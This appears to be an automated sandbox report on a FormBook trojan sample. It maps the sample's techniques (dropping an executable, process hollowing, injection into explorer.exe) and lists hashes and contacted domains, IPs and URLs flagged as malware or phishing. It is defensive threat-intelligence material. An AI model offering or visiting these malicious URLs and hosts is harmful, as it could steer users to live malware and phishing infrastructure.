          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		Path Interception1
          Access Token Manipulation          		1
          Masquerading          		OS Credential Dumping121
          Security Software Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Shared Modules          		Boot or Logon Initialization Scripts612
          Process Injection          		2
          Virtualization/Sandbox Evasion          		LSASS Memory2
          Virtualization/Sandbox Evasion          		Remote Desktop Protocol1
          Clipboard Data          		Exfiltration Over Bluetooth1
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
          Access Token Manipulation          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)612
          Process Injection          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled Transfer12
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          System Network Configuration Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common3
          Obfuscated Files or Information          		Cached Domain Credentials1
          System Network Connections Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup Items1
          Software Packing          		DCSync2
          File and Directory Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
          System Information Discovery          		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 601808 Sample: 4505682666.exe Startdate: 02/04/2022 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Antivirus detection for URL or domain 2->51 53 5 other signatures 2->53 11 4505682666.exe 18 2->11         started        process3 file4 31 C:\Users\user\AppData\...\sfxwkrzgst.exe, PE32 11->31 dropped 14 sfxwkrzgst.exe 11->14         started        process5 signatures6 67 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 14->67 69 Tries to detect virtualization through RDTSC time measurements 14->69 71 Injects a PE file into a foreign processes 14->71 17 sfxwkrzgst.exe 14->17         started        process7 signatures8 39 Modifies the context of a thread in another process (thread injection) 17->39 41 Maps a DLL or memory area into another process 17->41 43 Sample uses process hollowing technique 17->43 45 Queues an APC in another process (thread injection) 17->45 20 explorer.exe 17->20 injected process9 dnsIp10 33 www.ohhhmarketing.com 203.170.80.250, 80 DREAMSCAPE-AS-APDreamscapeNetworksLimitedAU Australia 20->33 35 9tv-cname.com 23.225.32.156, 49853, 80 CNSERVERSUS United States 20->35 37 8 other IPs or domains 20->37 55 System process connects to network (likely due to code injection or exploit) 20->55 57 Performs DNS queries to domains with low reputation 20->57 59 Uses netstat to query active network connections and open ports 20->59 24 NETSTAT.EXE 20->24         started        signatures11 process12 signatures13 61 Modifies the context of a thread in another process (thread injection) 24->61 63 Maps a DLL or memory area into another process 24->63 65 Tries to detect virtualization through RDTSC time measurements 24->65 27 cmd.exe 1 24->27         started        process14 process15 29 conhost.exe 27->29         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          4505682666.exe43%VirustotalBrowse
          4505682666.exe52%ReversingLabsWin32.Trojan.FormBook
          4505682666.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          4.0.sfxwkrzgst.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.sfxwkrzgst.exe.400000.8.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.2.sfxwkrzgst.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          2.2.sfxwkrzgst.exe.2730000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          4.0.sfxwkrzgst.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          9tv-cname.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          www.stxgvdhndry.mobi/iedi/100%Avira URL Cloudmalware
          https://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf10%Avira URL Cloudsafe
          http://www.sarahkramirez.store/iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQ100%Avira URL Cloudmalware
          http://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UA100%Avira URL Cloudphishing
          http://www.taeksanglee.com/iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQ100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          9tv-cname.com
          		23.225.32.156
          		truetrueunknown
          www.sarahkramirez.store
          		104.21.60.208
          		truetrue
            		unknown
            taeksanglee.com
            		99.83.248.72
            		truetrue
              		unknown
              www.ohhhmarketing.com
              		203.170.80.250
              		truetrue
                		unknown
                www.03gjm.xyz
                		unknown
                		unknowntrue
                  		unknown
                  www.taeksanglee.com
                  		unknown
                  		unknowntrue
                    		unknown
                    www.stxgvdhndry.mobi
                    		unknown
                    		unknowntrue
                      		unknown
                      www.supertry.online
                      		unknown
                      		unknowntrue
                        		unknown
                        www.malmaten.xyz
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          www.stxgvdhndry.mobi/iedi/true
                          • Avira URL Cloud: malware
                          		low
                          http://www.sarahkramirez.store/iedi/?m0=2H7NzpX8+kWVL7RXiPeuot7T42yKgqjwvMyAB8WCBja83NZi/HARu3twuNCkw+yHno/S&D48xf=hDK0DtQtrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1+/c/JNlu63XO4AXvMln8G6I6USgbifPVY53JwlsJRA59FAfbt7UAtrue
                          • Avira URL Cloud: phishing
                          		unknown
                          http://www.taeksanglee.com/iedi/?m0=uFHIZhV534abe7udANH+fvyGGlu7ONiaMHmjxj5pqC2R3Lmy39g482CU6S2VMO33CU+j&D48xf=hDK0DtQtrue
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://www.03gjm.xyz/iedi/?D48xf=hDK0DtQ&m0=P3YweSqMhQMneRf1NETSTAT.EXE, 0000000F.00000002.513921900.00000000032E2000.00000004.10000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://nsis.sf.net/NSIS_ErrorError4505682666.exefalse
                            		high

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            99.83.248.72
                            		taeksanglee.comUnited States
                            		16509AMAZON-02UStrue
                            104.21.60.208
                            		www.sarahkramirez.storeUnited States
                            		13335CLOUDFLARENETUStrue
                            203.170.80.250
                            		www.ohhhmarketing.comAustralia
                            		38719DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUtrue
                            23.225.32.156
                            		9tv-cname.comUnited States
                            		40065CNSERVERSUStrue

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:601808
                            Start date and time:2022-04-02 04:10:09 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 9m 12s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:4505682666.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:27
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:1
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@9/3@7/4
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 60.6% (good quality ratio 57.9%)
                            • Quality average: 74%
                            • Quality standard deviation: 28.5%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 112
                            • Number of non-executed functions: 57
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe

                            Warnings

                            • Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, UpdateNotificationMgr.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, client.wns.windows.com, fs.microsoft.com, go.microsoft.com, sls.update.microsoft.com, ctldl.windowsupdate.com, settings-win.data.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Not all processes where analyzed, report is missing behavior information

                            Simulations

                            Behavior and APIs

                            No simulations

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            99.83.248.72PO 2000114843_PDF.exeGet hashmaliciousBrowse
                            • www.xn--meng-bh8p60mfo2bn4z.com/b23k/?u2JDn=WBfTadrMM6aIHJ3a3gzv+EeTNVWKELWrV7TmbYKCLeDdH+OmrEnKFwXrMw3UnFJSzgrz&t8R=-ZTtSNF
                            RFQ.# PO41000202103.exeGet hashmaliciousBrowse
                            • www.sensvia25.com/dyt/?I4hDaHop=RPND1ukU0fl7YmdT8iKkpTuRz4kAo7gJ8ckMZjuq4+sLjzyusDQpLOghth7bMhp1fCO0&Cd30vv=8pJx809xo00452r
                            ATk2s6Sej7.exeGet hashmaliciousBrowse
                            • www.racerforex.com/m30/?Ezr=ELvjQoQcJGhwz22w/SVVAeQo+KyocW7rfWjPFynFmsQLBVJLqQzynHj4zxkBKhHKYATmb7spdQ==&Qzr=Llvtw6sXypNX
                            104.21.60.208PO3221142020.exeGet hashmaliciousBrowse
                              RFQ-OM-3994 - Closing Date 31.1.2021 - MEPF-PO-2020-060PDF.exeGet hashmaliciousBrowse
                                203.170.80.250SWIFT Message.xlsxGet hashmaliciousBrowse
                                • www.hypotheque.xyz/u6vb/?6lip4=trAhLfEH&Sl-pp4=c3IKG2JsHNtK5zl36fCvIXy36K8P53oVDVMMpHFW1VhyR0x4TQnK1PBS6C4g5RbAiUShcQ==
                                Booking number 63200IN437668.exeGet hashmaliciousBrowse
                                • www.vinayagar.xyz/dvcw/?e6m0BD=sf+UYiDhtehr5fU3UUK4lZTAKcVjt5jfQy4PZuU9KVGDENPpP5JBNe4RxtXTmspsivq9&_txtHD=LZqLWroXC
                                ODFkNglL18.exeGet hashmaliciousBrowse
                                • www.hypotheque.xyz/u6vb/?d2=c3IKG2JpHKtO5jp74fCvIXy36K8P53oVDVUc1EZXx1hzRFd+UA2GjL5Q5nU29BfzpXPR&4hLT6=9r_Xq4bPK8itcl2p
                                LyY2cmtWjb.exeGet hashmaliciousBrowse
                                • www.tehoierenursery.online/dpzz/?oBZh=nQxT3wtJ43goNFGbqxp3LLqoykZM+ebY85UW0yuEn/s6viNE+8TCyMtn3mH9SRJKgY/JfUEO7Q==&i0=xHvXCL
                                j2dNDqM2JY.exeGet hashmaliciousBrowse
                                • www.farmstoragesolution.com/h4d0/?2dYhmpu=F2rrJ5ReEd4LrP5/UuuH3AoM21qgVCpNiBAHACju9J0ow42Hi84AgvxBuz92v76uvptG&k2MT5=bZB0dRC8
                                purchase_order.exeGet hashmaliciousBrowse
                                • www.universitysuccess.net/fui6/?3fdLibf0=RwFJjzagwk1eo6/3hqfDiQm8y5W2E1C6wzdG7Cu4zQwdVTcBTAvnDThO0YpyxPTvtm+4&yD=od94ulb0
                                9nM1eSsQgX.exeGet hashmaliciousBrowse
                                • www.mugsmindset.online/sbp5/?8p=rGgRi1v2ZQtEhSvMK9/Z4o4A37pNj53pyOvHh8zdl7xQErTb2p9Byy/EEdKTjOL/bmlG&0L00=4hwxUT-XILw
                                justifika Payment details.exeGet hashmaliciousBrowse
                                • www.a-mech.online/g0s6/?fTyPr=rotWKh0O+5j4vKXnlvS7GL1M6aL5f3/63WCE3rSYmjfM/i3pj0MQo4LlqtWGlZ2EA1W8&I4ah=w2MTqnnpWZSPKVw0
                                draft_inv dec21.exeGet hashmaliciousBrowse
                                • www.mackthetruck.com/n8ds/?pB=z2JtXhtxAhidvN&gHl=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL
                                hNfqWik7qw.exeGet hashmaliciousBrowse
                                • www.adelaideofficefitouts.com/rht9/?2d=d2RqHiFP7GtRsEFRKn4ztcJimb1zZosbxe5lPiT3HeEgy+1zxLvhIbh4BNC8Wn2mcAjG&NTiPcP=i488q
                                STATEMENT .docGet hashmaliciousBrowse
                                • www.mentation.online/bcwg/?CB3=YVmXGh8&eZ=yiId+2ekP1XS4WwOOSMXCrdt22hgudsZh6QSgOVem0oOHO44eh2BiSC3PJghWo4IKeaAnw==
                                BL_CI_PL.exeGet hashmaliciousBrowse
                                • www.mackthetruck.com/n8ds/?lZOD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&E0Dpk=l8hHaF
                                LBHkeG0UJk1YkgS.exeGet hashmaliciousBrowse
                                • www.tileonsale.online/a96n/?3fe=PBIGLrxEdW1ARb4E4Y/g+5oa3ioxDHC57jksxPNeqemN6ZgQynee/Bq7aFoZn10xYjrn&p6DDcf=5j0lqHmh
                                Zr26f1rL6r.exeGet hashmaliciousBrowse
                                • www.mackthetruck.com/n8ds/?6ldD=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&v6Mt=3fxxA4Z
                                DHL express 5809439160_pdf.exeGet hashmaliciousBrowse
                                • www.milanecollective.online/asva/?kPMHc8=_0Dd-Hq&0DHp3RF=7aaX/J2ETrbHcNqJ083e19LFvcBNT4ZfrDwr//xwcvRFhpQMdOXGJNS6rbnCanORiSHJi1ccfQ==
                                PO XIFFA55.exeGet hashmaliciousBrowse
                                • www.nourishtothrive.online/seqa/?1bipv=JE3I4xWFugjOxJ5VFE0to7dgN4EwGtl5zJXuUC2FBLunBFpLYOPJvgpk/9RTfebnIdfT&WpTx=5jx0
                                Payment Swift Copy Of 62271.03.exeGet hashmaliciousBrowse
                                • www.practicewordpress.online/hd6y/?P48Toj=MPDdsVuPc&6l=uR3v7dNGiPhrJuQymeSm4Kb/0RTMVBUA2t3j6f0ZQFE1NJOlvgt87pnVtWNGDBP+ta+b
                                Order RFQ#2021-16-11.exeGet hashmaliciousBrowse
                                • www.christopherkayedesign.online/y7n5/?qXtd=5ji4dxg8AFFDPP80&X2MLR0Kx=T1lZzS3ZD/UhzrSRx83RPyV4t8U307EowPnBg5pTvvKPpeE9zAKrRWkGyFwa7A30vEk4
                                AWB_SHIPPING DOCS.exeGet hashmaliciousBrowse
                                • www.mackthetruck.com/n8ds/?9rJT=hTCtvfJBK6Lgcsnz9iNzW/om0skZHj2xUOZ9QRyIykKuA9BOdz3qmP8oX5t0meM3+FVL&at=WtR4GZm
                                ExportUSA Corp RFQ 6000567507.docGet hashmaliciousBrowse
                                • www.mentation.online/bcwg/?oTitC8K=yiId+2ekP1XS4WwOOSMXCrdt22hgudsZh6QSgOVem0oOHO44eh2BiSC3PJghWo4IKeaAnw==&gZr=rnRhL6XHC

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                9tv-cname.comQH9099.xlsxGet hashmaliciousBrowse
                                • 23.225.32.156
                                795bR7WJ70.exeGet hashmaliciousBrowse
                                • 23.225.32.156
                                TT COPY_2022260.exeGet hashmaliciousBrowse
                                • 104.233.177.157
                                lR8SaN9tp1.exeGet hashmaliciousBrowse
                                • 23.224.235.100
                                Swift Copy20222601.PDF.exeGet hashmaliciousBrowse
                                • 23.225.32.156
                                1pBxcU5XYB.exeGet hashmaliciousBrowse
                                • 23.224.235.100
                                scan097890.exeGet hashmaliciousBrowse
                                • 104.233.177.157
                                shippment document.exeGet hashmaliciousBrowse
                                • 23.225.30.43
                                DHL - FINAL REMINDER -Receiver Address verification.exeGet hashmaliciousBrowse
                                • 23.225.30.43
                                Kemcon RFQ 12012022.xlsxGet hashmaliciousBrowse
                                • 104.233.177.157
                                QUOTATION REQUEST-77464563548764577.exeGet hashmaliciousBrowse
                                • 23.225.30.43
                                2021.12.23 #4 205WESOLARES.pdf .exeGet hashmaliciousBrowse
                                • 23.225.32.156
                                nbg6l8NcIU.exeGet hashmaliciousBrowse
                                • 23.224.235.100
                                KC5w2SJOpt.exeGet hashmaliciousBrowse
                                • 23.225.30.43
                                czOxHskgIAQwZ8m.exeGet hashmaliciousBrowse
                                • 23.224.235.100
                                REVIEW COPY 18-09-2021.xlsxGet hashmaliciousBrowse
                                • 104.233.177.157
                                GPSCHN202109144.exeGet hashmaliciousBrowse
                                • 23.225.32.156
                                OCT 15 2021 - PRINTABLE COPY.xlsxGet hashmaliciousBrowse
                                • 23.224.235.100
                                EZSOhOh0nx.exeGet hashmaliciousBrowse
                                • 23.224.235.100
                                Copia de pago_pdf.exeGet hashmaliciousBrowse
                                • 23.225.32.156

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                AMAZON-02USTGX.exeGet hashmaliciousBrowse
                                • 13.225.84.12
                                arm7Get hashmaliciousBrowse
                                • 139.180.247.125
                                68U0QXnd7XGet hashmaliciousBrowse
                                • 18.151.37.249
                                PV4Br3B2Al.exeGet hashmaliciousBrowse
                                • 3.132.159.158
                                arm6-20220401-2259Get hashmaliciousBrowse
                                • 18.247.0.64
                                mips-20220401-2259Get hashmaliciousBrowse
                                • 108.136.213.193
                                mipsel-20220401-2259Get hashmaliciousBrowse
                                • 13.221.153.222
                                i686-20220401-2259Get hashmaliciousBrowse
                                • 46.137.183.184
                                arm-20220401-2259Get hashmaliciousBrowse
                                • 18.143.228.214
                                i586-20220401-2259Get hashmaliciousBrowse
                                • 18.146.49.161
                                https://2a9xo4.axshare.com/Get hashmaliciousBrowse
                                • 143.204.101.82
                                https://https3a2f2fwww-com.preview-domain.com/auth/logon/?c=someone@isomeplace.comGet hashmaliciousBrowse
                                • 143.204.98.97
                                https://newjournal.net/2022/03/29/40-million-of-cinema-and-recreational-programme-under-conditions-of-approval/Get hashmaliciousBrowse
                                • 143.204.98.127
                                https://r20.rs6.net/tn.jsp?f=00182aTL9PXlW0eU5EvXGsO3kJ-SF6KjuGFNarWNy0WkEwSWQv-yDmqrjyCP0WUzWpCCH1C_sPeeXJ6NkNOMB_ZG-Kb4B2_i4jTIk1jweXYxKHqBCdrc6XwUF9B71-iLiNcRF6MXv8rXJ5VhfMRH6fv82qRNeDyP7asZUQwrNaZbWg=&c=DRB9b5X3Mp_OJHG1ZBe1HpNn0zYqAKPSKSRUme-uoF87yZv1u4xp2A==&ch=tNFt7wP6BP8rnXgQ7MRSO3ptYHvpPJr20mBmTPADeJcHqRbdKPk6og==Get hashmaliciousBrowse
                                • 143.204.98.48
                                PONUDA P771.vbsGet hashmaliciousBrowse
                                • 3.26.185.34
                                https://clicktime.symantec.com/3KkBVSMMM5B8xL8ezSWpu8P6H4?u=https%3A%2F%2Fmy.dealersocket.com%2Femailtrack%2Ftrack%2Ftrack%3FsiteId%3D7224%26sentId%3D17290%26entityId%3D66768%26emailType%3Ddoc%26redirectLink%3Dhttp%3A%2F%2F08761133321iViQkCASghu5.cavemanfitness.co.uk%2Fredirect%2Fmatthew.crummack%40domesticandgeneral.comGet hashmaliciousBrowse
                                • 3.120.66.179
                                DEMONS.arm7Get hashmaliciousBrowse
                                • 108.144.251.26
                                PO9413 2022-04-01__pdf.exeGet hashmaliciousBrowse
                                • 3.64.163.50
                                mobsync.exeGet hashmaliciousBrowse
                                • 52.211.58.169
                                mobsync.exeGet hashmaliciousBrowse
                                • 52.211.58.169
                                CLOUDFLARENETUSTGX.exeGet hashmaliciousBrowse
                                • 104.27.99.86
                                BF2.exeGet hashmaliciousBrowse
                                • 104.17.25.14
                                i586-20220401-2259Get hashmaliciousBrowse
                                • 1.10.54.100
                                V54382011.htmlGet hashmaliciousBrowse
                                • 104.16.126.175
                                https://tophelmet.org/spencerfane/of2Get hashmaliciousBrowse
                                • 104.21.60.145
                                https://2a9xo4.axshare.com/Get hashmaliciousBrowse
                                • 104.17.129.171
                                http://www.wteia.vaishalisales.com/#.4fkpdc5.aHR0cHM6Ly9pbnN0YW50dC5rZWVwLXBhc3N3b3JkLmNvbT9lPWNib3VleUBvbmVtZWRpY2FsLmNvbQ==Get hashmaliciousBrowse
                                • 104.18.11.207
                                Loader.exeGet hashmaliciousBrowse
                                • 172.67.68.68
                                http://www.edgewortheconomics.hamon.co.ke/link=?365616c6f6e736f4065646765776f72746865636f6e6f6d6963732e636f6d=#ZWRnZXdvcnRoZWNvbm9taWNzOTQ4OTY3Lmpvcm5hZGFkb21hcmtldGluZy5jb20uYnIvbWVoc2gyMy8/ZT1lYWxvbnNvQGVkZ2V3b3J0aGVjb25vbWljcy5jb20Get hashmaliciousBrowse
                                • 104.18.10.207
                                http://getpickshoe.comGet hashmaliciousBrowse
                                • 188.114.97.7
                                PO08-9422.exeGet hashmaliciousBrowse
                                • 188.114.97.7
                                22041081517_20220329_16042903_HesapOzeti.pdf.exeGet hashmaliciousBrowse
                                • 188.114.96.7
                                PO- ZA2214756000899800 List Xls.exeGet hashmaliciousBrowse
                                • 188.114.97.7
                                Puek66nEtT.exeGet hashmaliciousBrowse
                                • 188.114.97.7
                                PO Order RECEIPT.exeGet hashmaliciousBrowse
                                • 162.159.135.233
                                JXLiFN4rXk.exeGet hashmaliciousBrowse
                                • 188.114.96.7
                                http://pmnnqixnd.comGet hashmaliciousBrowse
                                • 188.114.97.7
                                http://clickserve.dartsearch.net/link/click?&ds_a_cid=680760384&ds_a_caid=12694754542&ds_a_agid=123477218634&ds_a_fiid=&ds_a_lid=&&ds_e_adid=512650395034&ds_e_matchtype=&ds_e_device=c&ds_e_network=&&ds_url_v=2&ds_dest_url=https%3a%2f%2fjkywc4.codesandbox.io/?dg=bmljb2xhLmJhcmF0aEBpc2xhbmRoZWFsdGguY2EGet hashmaliciousBrowse
                                • 104.18.22.207
                                inq_20220104.xlsxGet hashmaliciousBrowse
                                • 188.114.96.7
                                http://clickserve.dartsearch.net/link/click?&ds_a_cid=680760384&ds_a_caid=12694754542&ds_a_agid=123477218634&ds_a_fiid=&ds_a_lid=&&ds_e_adid=512650395034&ds_e_matchtype=&ds_e_device=c&ds_e_network=&&ds_url_v=2&ds_dest_url=https%3a%2f%2fjkywc4.codesandbox.io/?dg=bmljb2xhLmJhcmF0aEBpc2xhbmRoZWFsdGguY2EGet hashmaliciousBrowse
                                • 104.18.22.207

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Temp\sfxwkrzgst.exe

                                Download File
                                Process:C:\Users\user\Desktop\4505682666.exe
                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                Category:dropped
                                Size (bytes):4096
                                Entropy (8bit):3.8758035442709544
                                Encrypted:false
                                SSDEEP:48:vpgAo/orl75h+mShKHhMOxqVYyQKSTX8JegNdhmY+FTT05/KYmR:BPIihqhKHhMoqVYyQKS4egqHbVR
                                MD5:4745AFD382988B0E54FCA3B7C6CC62C6
                                SHA1:E883780E858C58535D2E8FA9C236917B5FCC03F2
                                SHA-256:F508111C2DB55EB87D8EF5977829DFF50A682162D33B8BD6B5291BD372A7228A
                                SHA-512:EE13008D1175E9E76E44D373411E9C30A24F0FBC306A009C3C46A73B2285D45D45E5977C4A7CD31E86A13D3C8D6BD951361222FF74A844BD678465C48F499B2F
                                Malicious:true
                                Reputation:low
                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....Fb..........................................@..........................P............@.................................. .......0.......................@..L...................................................D!...............................text............................... ..`.rdata....... ......................@..@.rsrc........0......................@..@.reloc..L....@......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\sxlvpqj

                                Download File
                                Process:C:\Users\user\Desktop\4505682666.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):4987
                                Entropy (8bit):6.153215954287926
                                Encrypted:false
                                SSDEEP:96:6m1Dp+ikskmZ7XkR44jOpqFtq+DPvKn2h+yXVL85X:6mn+ikpmlryoik2hpaX
                                MD5:696BC3C6233536E21811A6584FDE5548
                                SHA1:D098830B1E95618142BCB303C20F8D5622670165
                                SHA-256:059DBCBCF09CE33D811996A820C05FCF5A6988BD117B1C1D8FF05C8872466903
                                SHA-512:96503993C3A18CE72BC4DE4EA48881DD3A01636F19545EDFA73F50E5DD7FC1F2599BDDD48BA2B0568BEBD6CEBF2338F2A51CAF6B56F5D1802895CD9B095A1E0D
                                Malicious:false
                                Reputation:low
                                Preview:.....%.-.....-K....^H....^H...-K..i.....-K...;..;.#...........R.;..;.#........N..Z.;..;.#..].....V..b.;..;.#..p.....^..j-3..8.D.FE^........%.-...W.....%.%.#._.\D.G..%..#.l.....K.-.D......-...e.K..;.G.;N.;V.F.;^.G.;..;..+.:.I.%..I....-..;..;...%....K......i.......-...e%K...%....%..l...%....^H...%.%...=.%.%.%.%._..%._...%.%..%...%.%.%..l..6..h1.&....@...l..6H.Q1.H.......l..6...1.......l...%.-....^H...i....#....-3..:.%.h..%....%..........+^:.%.D.GEW......R#.D.G_.......RD.D.FE^.#...6H.Q1.O....`......#..;......-3..:.-K...i....%.%..l...%.-...^H...i.....#.^..-3..:.%.h..%....%......M...+^.*$...%.D.GEW...^..j%.D.G_....^..j%.D.GO...^..j%..WD..E\...^..j#.D.G_....^..jD.D.FE^.#.^.6..h1..........-3..:.%.%......;..;..;..;..;........-3..:.-K...i....%.%..l...%.-.i....#....-3..:.%.h..%....%......D...+^:.%.D.GEW.......%.D.G_........D.D.FE^.#...6...1..............;

                                C:\Users\user\AppData\Local\Temp\u3c84e6wfvpm5qb7x3zf

                                Download File
                                Process:C:\Users\user\Desktop\4505682666.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):216529
                                Entropy (8bit):7.9902383214332175
                                Encrypted:true
                                SSDEEP:6144:316xrtbWc81NGvpQJUKSNbJ1xX5mDEvLxv:l6xZeX+pQJUKShxpEEVv
                                MD5:2F50D4AB85898AC09F51AB8F33E01409
                                SHA1:DBD29CE04B44FD327646EF8829D02A7107AB40C9
                                SHA-256:A89C7B2C66EB0700D4CBAF19C310660F4CC393FDD787CD6A0F223C07B7A2E3FB
                                SHA-512:16BDA569D14CEB00F9B4E35D93BC6EF72EC9B8EC57CAED0550F811AC21BA8DE9F9DD038F77F3E07F7B6D2E1FBA2CB9C2B7A67652E9451202CB6F716B4215A6ED
                                Malicious:false
                                Reputation:low
